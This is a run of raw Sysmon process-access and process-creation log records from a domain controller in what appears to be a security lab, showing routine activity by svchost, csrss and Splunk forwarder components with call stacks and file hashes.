13:14:15.047{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.047{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.047{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-43A7-6000-FB00-000000009A01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.047{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43A7-6000-FB00-000000009A01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.048{08A6967A-43A7-6000-FB00-000000009A01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43A8-6000-FD00-000000009A01}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-43A8-6000-FD00-000000009A01}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.391{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43A8-6000-FD00-000000009A01}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:16.392{08A6967A-43A8-6000-FD00-000000009A01}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.876{08A6967A-43A9-6000-FE00-000000009A01}31484104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43A9-6000-FE00-000000009A01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:17.736{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 